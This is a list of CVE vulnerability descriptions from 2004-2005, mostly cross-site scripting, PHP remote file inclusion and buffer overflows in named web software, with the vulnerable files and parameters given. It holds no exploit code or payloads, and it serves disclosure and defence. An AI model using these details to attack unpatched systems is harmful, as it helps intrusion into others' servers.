[CVE-2005-0694] Hosting Controller 6.1 Hotfix 1.7 and earlier stores log files under the web root, which allows remote attackers to obtain sensitive information via a direct request to HCDiskQuotaService.csv.
[CVE-2005-0692] Cross-site scripting (XSS) vulnerability in fusion_core.php for PHP-Fusion 5.x allows remote attackers to inject arbitrary web script or HTML via a message with IMG bbcode containing character-encoded Javascript.
[CVE-2005-0691] PHP remote file inclusion vulnerability in article mode for modules.php in SocialMPN allows remote attackers to execute arbitrary PHP code by modifying the name parameter to reference a URL on a remote web server that contains the code.
[CVE-2005-0685] Multiple access validation errors in OutStart Participate Enterprise (PE) allow remote attackers to (1) browse arbitrary directory trees by modifying the rootFolder parameter to displaynavigator.jsp, (2) rename arbitrary directory objects by modifying the selectedObject parameter to renamepopup.jsp, (3) delete arbitrary directory objects by modifying the selectedObjectsCSV parameter to displaydeletenavigator.jsp, and conduct other unauthorized activities via the (4) showDeleteView, (5) showWebFolderView, (6) showLibraryView, (7) showMyLibraryView, (8) singleSelectObject, (9) processRadioSelection, (10) processCheckboxSelection, (11) singleSelectObject, (12) addToSelectedObjects, or (13) removeFromSelectedObjects commands.
[CVE-2005-0684] Multiple buffer overflows in the web tool for MySQL MaxDB before 7.5.00.26 allow remote attackers to execute arbitrary code via (1) an HTTP GET request with a long file parameter after a percent ("%") sign or (2) a long Lock-Token string to the WebDAV functionality, which is not properly handled by the getLockTokenHeader function in WDVHandler_CommonUtils.c.
[CVE-2005-0682] Cross-site scripting (XSS) vulnerability in common.inc in Drupal before 4.5.2 allows remote attackers to inject arbitrary web script or HTML via certain inputs.
[CVE-2005-0680] PHP remote file inclusion vulnerability in download_center_lite.inc.php for Download Center Lite 1.6 allows remote attackers to execute arbitrary PHP code by modifying the script_root parameter to reference a URL on a remote web server that contains the code.
[CVE-2005-0679] PHP remote file inclusion vulnerability in tell_a_friend.inc.php for Tell A Friend Script 2.7 before 20050305 allows remote attackers to execute arbitrary PHP code by modifying the script_root parameter to reference a URL on a remote web server that contains the code. NOTE: it was later reported that 2.4 is also affected.
[CVE-2005-0678] PHP remote file inclusion vulnerability in formmail.inc.php for Form Mail Script 2.3 and earlier allows remote attackers to execute arbitrary PHP code by modifying the script_root to reference a URL on a remote web server that contains the code.
[CVE-2005-0675] Cross-site scripting (XSS) vulnerability in index.php for Zorum 3.5 allows remote attackers to inject arbitrary web script or HTML via the (1) list or (2) frommethod parameters.
[CVE-2005-0674] Cross-site scripting (XSS) vulnerability in the News module for paBox 1.6 allows remote attackers to inject arbitrary web script or HTML via the text hidden parameter in an HTTP POST request.
[CVE-2005-0673] Cross-site scripting (XSS) vulnerability in usercp_register.php for phpBB 2.0.13 allows remote attackers to inject arbitrary web script or HTML by setting the (1) allowhtml, (2) allowbbcode, or (3) allowsmilies parameters to inject HTML into signatures for personal messages, possibly when they are processed by privmsg.php or viewtopic.php.
[CVE-2005-0670] Cross-site scripting (XSS) vulnerability in phpCOIN 1.2.0 through 1.2.1b allows remote attackers to inject arbitrary web script or HTML via (1) the new parameter to mod.php, (2) the w parameter to mod.php, (3) the e parameter to login.php, (4) the o parameter to login.php, and possibly other scripts.
[CVE-2005-0662] Cross-site scripting (XSS) vulnerability in index.php for MercuryBoard 1.1.2 allows remote attackers to inject arbitrary web script or HTML via the Avatar field.
[CVE-2005-0660] Multiple cross-site scripting (XSS) vulnerabilities in D-Forum 1.11 allow remote attackers to inject arbitrary web script or HTML via certain fields, as demonstrated using the page parameter in nav.php3.
[CVE-2005-0656] Multiple cross-site scripting (XSS) vulnerabilities in auraCMS 1.5 allow remote attackers to inject arbitrary web script or HTML via the (1) hits parameter to hits.php, (2) query parameter to index.php, or (3) theCount parameter to counter.php.
[CVE-2005-0650] Multiple cross-site scripting (XSS) vulnerabilities in ProjectBB 0.4.5.1 allow remote attackers to inject arbitrary web script or HTML via (1) the pages parameter to divers.php (incorrectly referred to as "drivers.php" by some sources), (2) the search feature text area, (3) the forum name, (4) the site name, or (5) the maximum avatar size in the option section, or the (6) new category or (7) new forum fields in the forum section.
[CVE-2005-0645] Cross-site scripting (XSS) vulnerability in show.inc.php in cuteNews 1.3.6 allows remote attackers to inject arbitrary HTML, web script, and PHP code via the (1) CLIENT-IP or (2) X-FORWARDED-FOR header in an HTTP POST request to show_news.php.
[CVE-2005-0641] Cross-site scripting (XSS) vulnerability in the Reporter for Computer Associates (CA) Unicenter Asset Management (UAM) 4.0 allows remote attackers to inject arbitrary HTML or web script via the (1) name or (2) description in a report template.
[CVE-2005-0629] Multiple cross-site scripting (XSS) vulnerabilities in profile.php in 427BB 2.2 allow remote attackers to inject arbitrary web script or HTML via the (1) user or (2) Avatar parameters.
[CVE-2005-0628] Multiple cross-site scripting (XSS) vulnerabilities in Forumwa 1.0 allow remote attackers to inject arbitrary web script or HTML via (1) the keyword parameter in search.php or the (2) body or (3) subject of a forum message.
[CVE-2005-0616] Multiple cross-site scripting (XSS) vulnerabilities in the Download module for PostNuke 0.750 and 0.760-RC2 allow remote attackers to inject arbitrary web script or HTML via the (1) Program name, (2) File link, (3) Author name, (4) Author e-mail address, (5) File size, (6) Version, or (7) Home page variables.
[CVE-2005-0608] Heap-based buffer overflow in server.cpp for WebMod 0.47 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a POST request with a Content-Length that is less than the amount of data that is actually sent.
[CVE-2005-0606] Cross-site scripting (XSS) vulnerability in settings.inc.php for CubeCart 2.0.0 through 2.0.5, as used in multiple PHP files, allows remote attackers to inject arbitrary HTML or web script via the (1) cat_id, (2) PHPSESSID, (3) view_doc, (4) product, (5) session, (6) catname, (7) search, or (8) page parameters.
[CVE-2005-0593] Firefox before 1.0.1 and Mozilla before 1.7.6 allow remote attackers to spoof the SSL "secure site" lock icon via (1) a web site that does not finish loading, which shows the lock of the previous site, (2) a non-HTTP server that uses SSL, which causes the lock to be displayed when the SSL handshake is completed, or (3) a URL that generates an HTTP 204 error, which updates the icon and location information but does not change the display of the original site.
[CVE-2005-0587] Firefox before 1.0.1 and Mozilla before 1.7.6 allow remote malicious web sites to overwrite arbitrary files by tricking the user into downloading a .LNK (link) file twice, which overwrites the file that was referenced in the first .LNK file.
[CVE-2005-0586] Firefox before 1.0.1 and Mozilla before 1.7.6 allow remote malicious web sites to spoof the extensions of files to download via the Content-Disposition header, which could be used to trick users into downloading dangerous content.
[CVE-2005-0585] Firefox before 1.0.1 and Mozilla before 1.7.6 truncates long sub-domains or paths for display, which may allow remote malicious web sites to spoof legitimate sites and facilitate phishing attacks.
[CVE-2005-0574] Directory traversal vulnerability in CIS WebServer 3.5.13 allows remote attackers to read arbitrary files via .. (dot dot) sequences in the URL.
[CVE-2005-0572] index.php in phpWebSite 0.10.0 and earlier allows remote attackers to obtain sensitive information via an invalid SEA_search_module parameter, which reveals the path in a PHP error message.
[CVE-2005-0565] The Announce module in phpWebSite 0.10.0 and earlier allows remote attackers to execute arbitrary PHP code by setting the Image field to reference a PHP file whose name contains a .gif.php extension.
[CVE-2005-0563] Cross-site scripting (XSS) vulnerability in Microsoft Outlook Web Access (OWA) component in Exchange Server 5.5 allows remote attackers to inject arbitrary web script or HTML via an email message with an encoded javascript: URL ("javAsc
[CVE-2005-0553] Race condition in the memory management routines in the DHTML object processor in Microsoft Internet Explorer 5.01, 5.5, and 6 allows remote attackers to execute arbitrary code via a malicious web page or HTML e-mail, aka "DHTML Object Memory Corruption Vulnerability".
[CVE-2005-0549] Cross-site scripting (XSS) vulnerability in Solaris AnswerBook2 Documentation 1.4.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the "View Log Files" function.
[CVE-2005-0548] Cross-site scripting (XSS) vulnerability in Solaris AnswerBook2 Documentation 1.4.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the Search function.
[CVE-2005-0543] Cross-site scripting (XSS) vulnerability in phpMyAdmin 2.6.1 allows remote attackers to inject arbitrary HTML and web script via (1) the strServer, cfg[BgcolorOne], or strServerChoice parameters in select_server.lib.php, (2) the bg_color or row_no parameters in display_tbl_links.lib.php, the left_font_family parameter in theme_left.css.php, or the right_font_family parameter in theme_right.css.php.
[CVE-2005-0538] Directory traversal vulnerability in (1) GinpPictureServlet.java and (2) PicCollection.java in ginp (Java Photo Gallery Web Application) before 0.22 allows remote attackers to read arbitrary files.
[CVE-2005-0534] Multiple cross-site scripting (XSS) vulnerabilities in MediaWiki 1.3.x before 1.3.11 and 1.4 beta before 1.4 rc1 allow remote attackers to inject arbitrary web script.
[CVE-2005-0526] Multiple cross-site scripting (XSS) vulnerabilities in PBLang 4.65 allow remote attackers to inject arbitrary web script or HTML via (1) the search string to search.php, (2) the subject of a PM, which is processed by pm.php, or (3) the body of a PM, which is processed by pmpshow.php.
[CVE-2005-0514] Cross-site scripting (XSS) vulnerability in Verity Ultraseek before 5.3.3 allows remote attackers to inject arbitrary HTML and web script via search parameters.
[CVE-2005-0513] PHP remote file inclusion vulnerability in mail_autocheck.php in the Email This Entry add-on for pMachine Pro 2.4, and possibly other versions including pMachine Free, allows remote attackers to execute arbitrary PHP code by directly requesting mail_autocheck.php and modifying the pm_path parameter to reference a URL on a remote web server that contains the code, a different vulnerability than CVE-2003-1086.
[CVE-2005-0512] PHP remote file inclusion vulnerability in Tar.php in Mambo 4.5.2 allows remote attackers to execute arbitrary PHP code by modifying the mosConfig_absolute_path parameter to reference a URL on a remote web server that contains the code, a different vulnerability than CVE-2004-1693.
[CVE-2005-0509] Multiple cross-site scripting (XSS) vulnerabilities in the Mono 1.0.5 implementation of ASP.NET (.Net) allow remote attackers to inject arbitrary HTML or web script via Unicode representations for ASCII fullwidth characters that are converted to normal ASCII characters, including ">" and "<".
[CVE-2005-0495] Cross-site scripting (XSS) vulnerability in ZeroBoard allows remote attackers to inject arbitrary web script or HTML via the (1) sn1, (2) year, or (3) page parameter to zboard.php or (4) filename to view_image.php.
[CVE-2005-0490] Multiple stack-based buffer overflows in libcURL and cURL 7.12.1, and possibly other versions, allow remote malicious web servers to execute arbitrary code via base64 encoded replies that exceed the intended buffer lengths when decoded, which is not properly handled by (1) the Curl_input_ntlm function in http_ntlm.c during NTLM authentication or (2) the Curl_krb_kauth and krb4_auth functions in krb4.c during Kerberos authentication.
[CVE-2005-0487] Cross-site scripting (XSS) vulnerability in index.php for Kayako ESupport 2.3.1, and possibly other versions, allows remote attackers to inject arbitrary HTML and web script via the nav parameter.
[CVE-2005-0485] Cross-site scripting (XSS) vulnerability in comment.php for paNews 2.0b4 for PHP Arena allows remote attackers to inject arbitrary HTML and web script via the showpost parameter.
[CVE-2005-0480] Cross-site scripting (XSS) vulnerability in TrackerCam 5.12 and earlier allows remote attackers to inject arbitrary HTML or web script via the login request, which is recorded in a log file but not properly handled when the administrator views the log file.
[CVE-2005-0477] Cross-site scripting (XSS) vulnerability in the SML code for Invision Power Board 1.3.1 FINAL allows remote attackers to inject arbitrary web script via (1) a signature file or (2) a message post containing an IMG tag within a COLOR tag whose style is set to background:url.
[CVE-2005-0476] Cross-site scripting (XSS) vulnerability in hpm_guestbook.cgi allows remote attackers to inject arbitrary web script or HTML by posting a message.
[CVE-2005-0474] SQL injection vulnerability in the user_valid_crypt function in user.php in WebCalendar 0.9.45 allows remote attackers to execute arbitrary SQL commands via an encoded webcalendar_session cookie.
[CVE-2005-0467] Multiple integer overflows in the (1) sftp_pkt_getstring and (2) fxp_readdir_recv functions in the PSFTP and PSCP clients for PuTTY 0.56, and possibly earlier versions, allow remote malicious web sites to execute arbitrary code via SFTP responses that corrupt the heap after insufficient memory has been allocated.
[CVE-2005-0462] Cross-site scripting (XSS) vulnerability in MercuryBoard 1.0.x and 1.1.x allows remote attackers to inject arbitrary HTML and web script via the f parameter.
[CVE-2005-0459] phpMyAdmin 2.6.2-dev, and possibly earlier versions, allows remote attackers to determine the full path of the web root via a direct request to select_lang.lib.php, which reveals the path in a PHP error message.
[CVE-2005-0458] Cross-site scripting (XSS) vulnerability in contact_us.php in osCommerce 2.2-MS2 allows remote attackers to inject arbitrary web script or HTML via the enquiry parameter.
[CVE-2005-0452] Multiple cross-site scripting (XSS) vulnerabilities in Microsoft ASP.NET (.Net) 1.0 and 1.1 to SP1 allow remote attackers to inject arbitrary HTML or web script via Unicode representations for ASCII fullwidth characters that are converted to normal ASCII characters, including ">" and "<".
[CVE-2005-0445] Cross-site scripting (XSS) vulnerability in Open WebMail 2.x allows remote attackers to inject arbitrary HTML or web script via the domain name parameter (logindomain) in the login page.
[CVE-2005-0443] index.php in CubeCart 2.0.4 allows remote attackers to (1) obtain the full path for the web server or (2) conduct cross-site scripting (XSS) attacks via an invalid language parameter, which echoes the parameter in a PHP error message.
[CVE-2005-0435] awstats.pl in AWStats 6.3 and 6.4 allows remote attackers to read server web logs by setting the loadplugin and pluginmode parameters to rawlog.
[CVE-2005-0434] Multiple cross-site scripting (XSS) vulnerabilities in Php-Nuke 7.5 allow remote attackers to inject arbitrary HTML or web script via (1) the newdownloadshowdays parameter in a NewDownloads operation or (2) the newlinkshowdays parameter in a NewLinks operation.
[CVE-2005-0433] Php-Nuke 7.5 allows remote attackers to determine the full path of the web server via invalid or missing arguments to (1) db.php, (2) mainfile.php, (3) Downloads/index.php, or (4) Web_Links/index.php, which lists the path in a PHP error message.
[CVE-2005-0432] BEA WebLogic Server 7.0 Service Pack 5 and earlier, and 8.1 Service Pack 3 and earlier, generates different login exceptions that suggest why an authentication attempt fails, which makes it easier for remote attackers to guess passwords via brute force attacks.
[CVE-2005-0427] The ebuild of Webmin before 1.170-r3 on Gentoo Linux includes the encrypted root password in the miniserv.users file when building a tbz2 of the webmin package, which allows remote attackers to obtain and possibly crack the encrypted password.
[CVE-2005-0425] Unknown vulnerability in IBM Websphere Application Server 5.0, 5.1, and 6.0 when running on Windows, allows remote attackers to obtain the source code for Java Server Pages (.jsp) via a crafted URL that causes the page to be processed by the file serving servlet instead of the JSP engine.
[CVE-2005-0420] Microsoft Outlook Web Access (OWA), when used with Exchange, allows remote attackers to redirect users to arbitrary URLs for login via a link to the owalogon.asp application.
[CVE-2005-0418] Argument injection vulnerability in Java Web Start for J2SE 1.4.2 up to 1.4.2_06, on Mac OS X, allows untrusted applications to gain privileges via the value parameter of a property tag in a JNLP file. NOTE: it is highly likely that this item will be MERGED with CVE-2005-0836.
[CVE-2005-0412] Cross-site scripting (XSS) vulnerability in Spidean PostWrap allows remote attackers to inject arbitrary HTML and web script via the page parameter.
[CVE-2005-0407] Cross-site scripting (XSS) vulnerability in Openconf 1.04, and possibly other versions before 1.10, allows remote attackers to inject arbitrary HTML and web script via the paper title.
[CVE-2005-0397] Format string vulnerability in the SetImageInfo function in image.c for ImageMagick before 6.0.2.5 may allow remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via format string specifiers in a filename argument to convert, which may be called by other web applications.
[CVE-2005-0391] geneweb 4.10 and earlier does not properly check file permissions and content during conversion, which allows attackers to modify arbitrary files.
[CVE-2005-0386] Cross-site scripting (XSS) vulnerability in network.cgi in mailreader before 2.3.29 allows remote attackers to inject arbitrary web script or HTML via MIME text/enriched or text/richtext messages.
[CVE-2005-0381] Cross-site scripting (XSS) vulnerability in f.aspx in forumKIT 1.0 allows remote attackers to inject arbitrary web script or HTML via the members parameter.
[CVE-2005-0380] Multiple PHP remote file inclusion vulnerabilities in (1) print_category.php, (2) login.php, (3) setup.php, (4) ask_password.php, or (5) error.php in ZeroBoard 4.1pl5 and earlier allow remote attackers to execute arbitrary PHP code by modifying the dir parameter to reference a URL on a remote web server that contains the code.
[CVE-2005-0378] Multiple cross-site scripting (XSS) vulnerabilities in Horde 3.0 allow remote attackers to inject arbitrary web script or HTML via the (1) group parameter to prefs.php or (2) url parameter to index.php.
[CVE-2005-0376] PHP remote file inclusion vulnerability in SGallery 1.01 allows local and possibly remote attackers to execute arbitrary PHP code by modifying the DOCUMENT_ROOT parameter to reference a URL on a remote web server that contains (1) config.php or (2) sql_layer.php.
[CVE-2005-0374] Cross-site scripting (XSS) vulnerability in Bitboard 2.5 and earlier allows remote attackers to inject arbitrary web script or HTML via an [img] bbcode image tag with an event such as mouseover.
[CVE-2005-0341] Apple Safari 1.2.4 does not obey the Content-type field in the HTTP header and renders text as HTML, which allows remote attackers to inject arbitrary web script or HTML and perform cross-site scripting (XSS) attacks.
[CVE-2005-0338] Buffer overflow in Savant Web Server 3.1 allows remote attackers to execute arbitrary code via a long HTTP request.
[CVE-2005-0336] Cross-site scripting (XSS) vulnerability in EMotion MediaPartner Web Server 5.0 allows remote attackers to inject arbitrary HTML or web script, as demonstrated using a URL containing .. sequences and HTML, which results in a directory browsing page that does not properly filter the HTML.
[CVE-2005-0335] Directory traversal vulnerability in EMotion MediaPartner Web Server 5.0 allows remote attackers to read arbitrary files via a .. (dot dot) in the URL.
[CVE-2005-0328] Zyxel P310, P314, P324 and Netgear RT311, RT314 running the latest firmware allow remote attackers on the WAN to obtain the IP address of the LAN side interface by pinging a valid LAN IP address, which generates an ARP reply from the WAN address side that maps the LAN IP address to the WAN's MAC address.
[CVE-2005-0324] Infinite Mobile Delivery Webmail 2.6 allows remote attackers to gain sensitive information via an HTTP request that contains invalid characters for a Windows foldername, which reveals the path in an error message.
[CVE-2005-0323] Cross-site scripting (XSS) vulnerability in Infinite Mobile Delivery Webmail 2.6 allows remote attackers to inject arbitrary web script or HTML via the URL.
[CVE-2005-0322] MERAK Mail Server 7.6.0 with Icewarp Web Mail 5.3.0 and Mail Server 7.6.4r with Icewarp Mail Server 5.3.2 uses weak encryption in the (1) users.cfg, (2) settings.cfg, (3) users.dat or (4) user.dat files, which allows local users to extract the passwords.
[CVE-2005-0321] MERAK Mail Server 7.6.0 with Icewarp Web Mail 5.3.0 allows remote authenticated users to gain sensitive information via an HTTP request to (1) calendar_d.html, (2) calendar_m.html, (3) calendar_w.html, or (4) calendar_y.html, which reveal the installation path.
[CVE-2005-0320] Multiple cross-site scripting vulnerabilities in MERAK Mail Server 7.6.0 with Icewarp Web Mail 5.3.0 allow remote attackers to inject arbitrary web script or HTML via the (1) username parameter to login.html, (2) accountid parameter to accountsettings_add.html, or the (3) note, (4) title, and (5) location fields to calendar.html.
[CVE-2005-0319] Direct remote injection vulnerability in modalfram.wdm in Alt-N WebAdmin 3.0.4 allows remote attackers to load external webpages that appear to come from the WebAdmin server, which allows remote attackers to inject arbitrary HTML or web script to facilitate cross-site scripting (XSS) and phishing attacks.
[CVE-2005-0318] useredit_account.wdm in Alt-N WebAdmin 3.0.4 does not properly validate account edits by the logged in user, which allows remote authenticated users to edit other users' account information via a modified user parameter.
[CVE-2005-0317] Cross-site scripting (XSS) vulnerability in useredit_account.wdm in Alt-N WebAdmin 3.0.4 allows remote attackers to inject arbitrary web script or HTML via the user parameter.
[CVE-2005-0316] WebWasher Classic 2.2.1 and 3.3, when running in server mode, does not properly drop CONNECT requests to the localhost from external systems, which could allow remote attackers to bypass intended access restrictions.
[CVE-2005-0314] Cross-site scripting (XSS) vulnerability in user.php in Magic Winmail Server 4.0 Build 1112 allows remote attackers to inject arbitrary web script or HTML via the personal information fields.
[CVE-2005-0309] Multiple cross-site scripting (XSS) vulnerabilities in (1) index.php or (2) mod.php in Exponent 0.95 allow remote attackers to inject arbitrary web script or HTML via the module parameter.
[CVE-2005-0307] Multiple cross-site scripting (XSS) vulnerabilities in index.php in MercuryBoard 1.1.1 allow remote attackers to inject arbitrary web script or HTML via the (1) s, (2) l, (3) a, (4) t, (5) to, or (6) re parameters.
[CVE-2005-0303] Multiple cross-site scripting (XSS) vulnerabilities in (1) comersus_supportError.asp or (2) comersus_backofficelite_supportError.asp in BackOffice Lite 6.0 and 6.01 allow remote attackers to inject arbitrary web script or HTML via the error parameter.
[CVE-2005-0296] ** DISPUTED ** NOTE: this issue has been disputed by the vendor. The error module in Novell GroupWise WebAccess allows remote attackers who have not authenticated to read potentially sensitive information, such as the version, via an incorrect login and a modified (1) error or (2) modify parameter that returns template files or the "about" information page.
[CVE-2005-0294] minis.php in Minis 0.2.1 allows remote attackers to cause a denial of service (infinite loop) via an HTTP request for a file that the web server does not have permission to read, as demonstrated using the month parameter.
[CVE-2005-0291] Cross-site scripting (XSS) vulnerability in the log viewer in NETGEAR FVS318 running firmware 2.4, and possibly other versions, allows remote attackers to inject arbitrary web script or HTML via a blocked URL phrase.
[CVE-2005-0288] The change password functionality in Bottomline Webseries Payment Application does not require the old password when users enter a new password, which could allow remote authenticated users to change other users' passwords.
[CVE-2005-0287] Bottomline Webseries Payment Application allows remote attackers to read arbitrary files on the network via a report template with modified ReportPath or ReportName values.
[CVE-2005-0286] eMotion MediaPartner Web Server 5.0 and 5.1 allows remote attackers to obtain sensitive information via an HTTP request for a .bhtml file that contains a (1) . (dot) or (2) + (plus sign) at the end, which returns the source code for that file.
[CVE-2005-0285] Webseries Payment Application does not properly restrict privileged operations, which allows remote authenticated users to gain privileges by directly accessing certain URLs.
[CVE-2005-0274] Multiple cross-site scripting (XSS) vulnerabilities in showgallery.php in PhotoPost before 4.86 allow remote attackers to inject arbitrary web script or HTML via the (1) cat, (2) si, (3) page, or (4) ppuser parameters.
[CVE-2005-0270] Multiple cross-site scripting (XSS) vulnerabilities in ReviewPost PHP Pro before 2.84 allow remote attackers to inject arbitrary web script or HTML via the (1) si parameter to showcat.php, (2) cat or (3) page parameter to showproduct.php, or (4) report parameter to reportproduct.php.
[CVE-2005-0266] Cross-site scripting (XSS) vulnerability in index.php in SugarCRM 1.X allows remote attackers to inject arbitrary web script or HTML via the (1) return_module, (2) return_action, (3) name, (4) module, or (5) record parameter.
[CVE-2005-0264] Multiple cross-site scripting (XSS) vulnerabilities in browse.php in OWL 0.7 and 0.8 allow remote attackers to inject arbitrary web script or HTML via the (1) expand or (2) order parameter.
[CVE-2005-0251] Cross-site scripting (XSS) vulnerability in bibindex.php for BibORB 1.3.2, and possibly earlier versions, allows remote attackers to inject arbitrary HTML and web script via the search parameter.
[CVE-2005-0236] The International Domain Name (IDN) support in Omniweb 5 allows remote attackers to spoof domain names using punycode encoded domain names that are decoded in URLs and SSL certificates in a way that uses homograph characters from other character sets, which facilitates phishing attacks.
[CVE-2005-0229] CitrusDB 0.3.5 and earlier stores the newfile.txt temporary data file under the web root, which allows remote attackers to steal credit card information via a direct request to newfile.txt.
[CVE-2005-0221] Cross-site scripting (XSS) vulnerability in login.php in Gallery 2.0 Alpha allows remote attackers to inject arbitrary web script or HTML via the g2_form[subject] field.
[CVE-2005-0220] Cross-site scripting vulnerability in login.php in Gallery 1.4.4-pl2 allows remote attackers to inject arbitrary web script or HTML via the username field.
[CVE-2005-0219] Multiple cross-site scripting (XSS) vulnerabilities in Gallery 1.3.4-pl1 allow remote attackers to inject arbitrary web script or HTML via (1) the index field in add_comment.php, (2) set_albumName, (3) slide_index, (4) slide_full, (5) slide_loop, (6) slide_pause, (7) slide_dir fields in slideshow_low.php, or (8) username field in search.php.
[CVE-2005-0216] Cross-site scripting (XSS) vulnerability in formmail.php in Woltlab Burning Board Lite 1.0.0, 1.0.1e, and possibly other versions, allows remote attackers to inject arbitrary web script and HTML via the userid parameter.
[CVE-2005-0197] Cisco IOS 12.1T, 12.2, 12.2T, 12.3 and 12.3T, with Multi Protocol Label Switching (MPLS) installed but disabled, allows remote attackers to cause a denial of service (device reload) via a crafted packet sent to the disabled interface.
[CVE-2005-0158] Format string vulnerability in bidwatcher before 1.3.17 allows remote malicious web servers from eBay, or a spoofed eBay server, to cause a denial of service and possibly execute arbitrary code via certain responses.
[CVE-2005-0142] Firefox 0.9, Thunderbird 0.6 and other versions before 0.9, and Mozilla 1.7 before 1.7.5 save temporary files with world-readable permissions, which allows local users to read certain web content or attachments that belong to other users, e.g. content that is managed by helper applications such as PDF.
[CVE-2005-0111] Stack-based buffer overflow in the websql CGI program in MySQL MaxDB 7.5.00 allows remote attackers to execute arbitrary code via a long password parameter.
[CVE-2005-0110] Internet Explorer 6 on Windows XP SP2 allows remote attackers to bypass the file download warning dialog and possibly trick an unknowledgeable user into executing arbitrary code via a web page with a body element containing an onclick tag, as demonstrated using the createElement function.
[CVE-2005-0104] Cross-site scripting (XSS) vulnerability in webmail.php in SquirrelMail before 1.4.4 allows remote attackers to inject arbitrary web script or HTML via certain integer variables.
[CVE-2005-0103] PHP remote file inclusion vulnerability in webmail.php in SquirrelMail before 1.4.4 allows remote attackers to execute arbitrary PHP code by modifying a URL parameter to reference a URL on a remote web server that contains the code.
[CVE-2005-0085] Cross-site scripting (XSS) vulnerability in ht://dig (htdig) before 3.1.6-r7 allows remote attackers to execute arbitrary web script or HTML via the config parameter, which is not properly sanitized before it is displayed in an error message.
[CVE-2005-0083] MySQL MaxDB 7.5.00 for Windows, and possibly earlier versions and other platforms, allows remote attackers to cause a denial of service (application crash) via invalid parameters to the (1) DBMCli_String::ReallocString, (2) DBMCli_String::operator, (3) DBMCli_Buffer::ForceResize, (4) DBMCli_Wizard::InstallDatabase, (5) DBMCli_Devspaces::Complete, (6) DBMWeb_TemplateWizard::askForWriteCountStep5, or (7) DBMWeb_DBMWeb::wizardDB functions, which triggers a null dereference.
[CVE-2005-0082] The sapdbwa_GetUserData function in MySQL MaxDB 7.5.0.0, and other versions before 7.5.0.21, allows remote attackers to cause a denial of service (crash) via invalid parameters to the WebDAV handler code, which triggers a null dereference that causes the SAP DB Web Agent to crash.
[CVE-2005-0058] Buffer overflow in the Telephony Application Programming Interface (TAPI) for Microsoft Windows 98, Windows 98 SE, Windows ME, Windows 2000, Windows XP, and Windows Server 2003 allows attackers to elevate privileges or execute arbitrary code via a crafted message.
[CVE-2005-0049] Windows SharePoint Services and SharePoint Team Services for Windows Server 2003 do not properly validate an HTTP redirection query, which allows remote attackers to inject arbitrary HTML and web script via a cross-site scripting (XSS) attack, or to spoof the web cache.
[CVE-2005-0040] Multiple cross-site scripting (XSS) vulnerabilities in DotNetNuke before 3.0.12 allow remote attackers to inject arbitrary web script or HTML via the (1) register a new user page, (2) User-Agent, or (3) Username, which is not properly quoted before sending to the error log.
[CVE-2005-0035] The Acrobat web control in Adobe Acrobat and Acrobat Reader 7.0 and earlier, when used with Internet Explorer, allows remote attackers to determine the existence of arbitrary files via the LoadFile ActiveX method.
[CVE-2005-0011] Multiple vulnerabilities in fliccd, when installed setuid root as part of the kdeedu Kstars support for Instrument Neutral Distributed Interface (INDI) in KDE 3.3 to 3.3.2, allow local users and remote attackers to execute arbitrary code via stack-based buffer overflows.
[CVE-2004-2766] Webmail in Sun ONE Messaging Server 6.1 and iPlanet Messaging Server 5.2 before 5.2hf2.02 allows remote attackers to obtain unspecified "access" to e-mail via a crafted e-mail message, related to a "session hijacking" issue, a different vulnerability than CVE-2005-2022 and CVE-2006-5486.
[CVE-2004-2765] Cross-site scripting (XSS) vulnerability in Webmail in Sun ONE Messaging Server 6.1 and iPlanet Messaging Server 5.2 before 5.2hf2.02, when Internet Explorer is used, allows remote attackers to inject arbitrary web script or HTML via a crafted e-mail message, a different vulnerability than CVE-2005-2022 and CVE-2006-5486.
[CVE-2004-2763] The default configuration of Sun ONE/iPlanet Web Server 4.1 SP1 through SP12 and 6.0 SP1 through SP5 responds to the HTTP TRACE request, which can allow remote attackers to steal information using cross-site tracing (XST) attacks in applications that are vulnerable to cross-site scripting.
[CVE-2004-2757] Cross-site scripting (XSS) vulnerability in the failed login page in Novell iChain before 2.2 build 2.2.113 and 2.3 First Customer Ship (FCS) allows remote attackers to inject arbitrary web script or HTML via the url parameter.
[CVE-2004-2756] Cross-site scripting (XSS) vulnerability in viewtopic.php in Xoops 2.x, possibly 2 through 2.0.5, allows remote attackers to inject arbitrary web script or HTML via the (1) forum and (2) topic_id parameters.
[CVE-2004-2755] Cross-site scripting (XSS) vulnerability in Symantec Web Security 2.5, 3.0.0, and 3.0.1 before build 62 allows remote attackers to inject arbitrary web script or HTML via the query string in blocked URLs that are listed in (1) error or (2) block page messages.
[CVE-2004-2752] Cross-site scripting (XSS) vulnerability in the Downloads module in PostNuke up to 0.726, and possibly later versions, allows remote attackers to inject arbitrary HTML and web script via the ttitle parameter in a viewdownloaddetails action.
[CVE-2004-2748] viewreport.pl in NetIQ WebTrends Reporting Center Enterprise Edition 6.1a allows remote attackers to determine the installation path via an invalid profileid parameter, which leaks the pathname in an error message.
[CVE-2004-2742] Cross-site scripting (XSS) vulnerability in the report viewer in Crystal Enterprise 8.5, 9, and 10 allows remote attackers to inject arbitrary web script or HTML via script in the URL to a report (RPT) file.
[CVE-2004-2741] Cross-site scripting (XSS) vulnerability in the "help window" (help.php) in Horde Application Framework 2.2.6 allows remote attackers to inject arbitrary web script or HTML via the (1) module, (2) topic, or (3) module parameters.
[CVE-2004-2738] Cross-site scripting (XSS) vulnerability in check_user_id.php in ZeroBoard 4.1pl4 and earlier allows remote attackers to inject arbitrary web script or HTML via the user_id parameter.
[CVE-2004-2735] Cross-site scripting (XSS) vulnerability in P4DB 2.01 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) SET_PREFERENCES parameter in SetPreferences.cgi.
[CVE-2004-2734] webadmin-apache.conf in Novell Web Manager of Novell NetWare 6.5 uses an uppercase Alias tag with an inconsistent lowercase directory tag for a volume, which allows remote attackers to bypass access control to the WEB-INF folder.
[CVE-2004-2733] Web Wiz Forums 7.7a uses invalid logic to determine user privileges, which allows remote attackers to (1) block arbitrary IP addresses via pop_up_ip_blocking.asp or (2) modify topics via pop_up_topic_admin.asp.
[CVE-2004-2725] Multiple cross-site scripting (XSS) vulnerabilities in Aztek Forum 4.0 allow remote attackers to inject arbitrary web script or HTML via (1) the search parameter in (a) search.php, (2) the email parameter in (b) subscribe.php, and (3) the return and (4) title parameters in (c) forum_2.php.
